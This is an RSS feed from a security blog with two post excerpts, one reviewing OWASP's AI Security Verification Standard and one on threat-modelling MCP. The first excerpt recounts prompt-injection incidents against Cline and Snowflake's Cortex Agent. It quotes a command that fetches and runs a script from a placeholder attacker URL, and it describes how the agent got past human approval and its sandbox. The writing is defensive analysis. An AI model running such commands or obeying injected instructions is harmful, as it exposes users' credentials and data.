<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Mcp on Napat&#39;s Inverse Blog</title>
    <link>/tags/mcp/</link>
    <description>Recent content in Mcp on Napat&#39;s Inverse Blog</description>
    <generator>Hugo</generator>
    <language>en-us</language>
    <lastBuildDate>Wed, 01 Apr 2026 21:26:00 +0700</lastBuildDate>
    <atom:link href="/tags/mcp/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>The First Real Standard for AI Security: What OWASP AISVS Gets Right, What It Misses, and What You Should Actually Do</title>
      <link>/2026-04-01-the-first-real-standard-for-ai-security-what-owasp-aisvs-gets-right-what-it-misses-and-what-you-should-actually-do/</link>
      <pubDate>Wed, 01 Apr 2026 21:26:00 +0700</pubDate>
      <guid>/2026-04-01-the-first-real-standard-for-ai-security-what-owasp-aisvs-gets-right-what-it-misses-and-what-you-should-actually-do/</guid>
      <description>&lt;p&gt;We spent twenty years getting web security to a place where it was boring. Boring was good. Boring meant it mostly worked. You&amp;rsquo;d run your OWASP Top 10 scanner, fix the SQL injection and XSS findings, check the boxes on the ASVS, and ship. Not glamorous. But it worked.&lt;/p&gt;
&lt;p&gt;Then someone figured out you could steal a whole system&amp;rsquo;s secrets by asking it nicely.&lt;/p&gt;
&lt;p&gt;That&amp;rsquo;s not a metaphor. In February 2026, security researcher Adnan Khan showed that you could compromise Cline&amp;rsquo;s production releases — an AI coding tool used by millions of developers — by opening a GitHub issue with a carefully crafted title. The issue title contained a prompt injection payload that tricked Claude into running &lt;code&gt;npm install&lt;/code&gt; on a malicious package, which then poisoned the GitHub Actions cache and pivoted to steal the credentials that publish Cline&amp;rsquo;s VS Code extension. An issue title. Not a zero-day exploit, not a nation-state attack chain. Words in a text field.&lt;/p&gt;
&lt;p&gt;This is the fundamental problem with AI security, and it&amp;rsquo;s the reason OWASP wrote the AI Security Verification Standard (AISVS). Traditional AppSec assumes deterministic programs: the code does what you wrote. Maybe what you wrote was wrong — a SQL injection, a buffer overflow — but the code executes faithfully. Fix the bug, it stays fixed. AI systems are probabilistic. The model doesn&amp;rsquo;t execute instructions; it generates plausible continuations. You can have perfect code, proper input validation, encrypted storage — and still get owned because someone hid instructions in a README file that the model decided to follow instead of yours.&lt;/p&gt;
&lt;p&gt;Here&amp;rsquo;s the uncomfortable truth: many teams deploying AI today use API-based models they don&amp;rsquo;t control. They can&amp;rsquo;t inspect training data or run adversarial evaluations against someone else&amp;rsquo;s model. AISVS describes a comprehensive posture; most teams consuming foundation models through APIs control maybe 10% of it. I&amp;rsquo;ll come back to this.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id=&#34;the-three-chapters-that-matter-most&#34;&gt;The Three Chapters That Matter Most&lt;/h2&gt;
&lt;p&gt;AISVS spans 14 chapters covering everything from training data provenance to human oversight. Rather than walking through all of them — you can read the spec yourself — I want to focus on the three that should be on every security engineer&amp;rsquo;s radar right now.&lt;/p&gt;
&lt;h3 id=&#34;c2-user-input-validation--the-prompt-injection-chapter&#34;&gt;C2: User Input Validation — The Prompt Injection Chapter&lt;/h3&gt;
&lt;p&gt;This is the chapter you implement first. Prompt injection is the SQL injection of AI systems: well-understood, frequently demonstrated, and still not consistently defended against. The Snowflake Cortex AI sandbox escape in March 2026 demonstrated this clearly. PromptArmor found that an indirect prompt injection hidden in a GitHub repository&amp;rsquo;s README could manipulate Snowflake&amp;rsquo;s Cortex Agent into executing &lt;code&gt;cat &amp;lt; &amp;lt;(sh &amp;lt; &amp;lt;(wget -q0- https://ATTACKER_URL.com/bugbot))&lt;/code&gt; — bypassing the human-in-the-loop approval system because the command validation didn&amp;rsquo;t inspect code inside process substitution expressions. The agent then set a flag to execute outside the sandbox, downloaded malware, and used cached Snowflake tokens to exfiltrate data and drop tables. Two days after release. Fixed, but instructive.&lt;/p&gt;
&lt;p&gt;AISVS C2 decomposes prompt injection defense into specific, testable controls. Requirement 2.1.1 mandates that all external inputs be treated as untrusted and screened by a prompt injection detection ruleset or classifier. Requirement 2.1.2 requires instruction hierarchy enforcement — system and developer messages must override user instructions across multi-step interactions. This is directly relevant to attacks like Clinejection, where the injected payload rode in through an issue title that was interpolated into the prompt without sanitization.&lt;/p&gt;
&lt;p&gt;The chapter also addresses subtler vectors. Requirement 2.2.1 mandates Unicode normalization before tokenization — homoglyph swaps and invisible control characters are a real bypass technique against naive input filters. Section 2.7 covers multi-modal validation: text extracted from images and audio must be treated as untrusted per 2.1.1, and files must be scanned for steganographic payloads before ingestion.&lt;/p&gt;
&lt;p&gt;For practitioners: start with 2.1.1 (prompt injection screening), 2.1.2 (instruction hierarchy), 2.4.1 (explicit input schemas), and 2.7.2 (treat extracted text as untrusted). That&amp;rsquo;s your Level 1 baseline.&lt;/p&gt;
&lt;h3 id=&#34;c9-autonomous-orchestration--the-agentic-risk-chapter&#34;&gt;C9: Autonomous Orchestration — The Agentic Risk Chapter&lt;/h3&gt;</description>
    </item>
    <item>
      <title>The USB-C Metaphor Hides the Hard Part</title>
      <link>/2026-03-22-the-usb-c-metaphor-hides-the-hard-part/</link>
      <pubDate>Sun, 22 Mar 2026 15:59:00 +0700</pubDate>
      <guid>/2026-03-22-the-usb-c-metaphor-hides-the-hard-part/</guid>
      <description>&lt;h2 id=&#34;threat-modeling-mcp-in-the-real-world&#34;&gt;Threat Modeling MCP in the Real World&lt;/h2&gt;
&lt;p&gt;People like to describe MCP as &amp;ldquo;USB-C for AI.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s a good line. It explains why people care.&lt;/p&gt;
&lt;p&gt;USB-C made hardware interoperability easier. MCP makes tool interoperability easier. Build once, connect everywhere, move faster.&lt;/p&gt;
&lt;p&gt;The problem with good metaphors is that they are usually true in one way and dangerously false in another.&lt;/p&gt;
&lt;p&gt;USB-C looks like a cable problem.
MCP looks like a protocol problem.&lt;/p&gt;
&lt;p&gt;But the hard part isn&amp;rsquo;t the connector. The hard part is delegation.&lt;/p&gt;
&lt;p&gt;When an AI client connects to tools through MCP, it is not just moving data. It is moving authority: who can read what, who can trigger what, and under which identity.&lt;/p&gt;
&lt;p&gt;That shift is what many threat models miss.&lt;/p&gt;
&lt;p&gt;They evaluate MCP like an integration layer, when they should evaluate it like an authorization fabric.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id=&#34;why-this-matters-now&#34;&gt;Why this matters now&lt;/h2&gt;
&lt;p&gt;Standards compress engineering cost. They also compress attacker learning curves.&lt;/p&gt;
&lt;p&gt;Before MCP, every integration had custom quirks. That was messy for developers and inconvenient for attackers. With standardization, we gain velocity and lose diversity. A weakness in common implementation patterns becomes reusable across many environments.&lt;/p&gt;
&lt;p&gt;This doesn&amp;rsquo;t mean MCP is unsafe. It means MCP is now important enough to threat model as first-class infrastructure.&lt;/p&gt;
&lt;p&gt;The teams that do this early will avoid the coming cycle: rapid adoption, soft defaults, then expensive retrofitting under incident pressure.&lt;/p&gt;
&lt;hr&gt;</description>
    </item>
  </channel>
</rss>
